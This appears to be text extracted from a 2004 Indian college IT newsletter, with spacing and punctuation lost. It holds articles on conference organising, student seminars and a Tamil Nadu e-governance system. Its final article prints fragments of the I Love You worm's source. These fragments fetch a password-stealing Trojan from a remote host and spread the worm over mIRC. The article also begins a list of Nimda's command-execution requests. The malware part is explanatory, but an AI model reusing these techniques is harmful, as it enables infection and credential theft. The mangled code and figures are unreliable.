Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

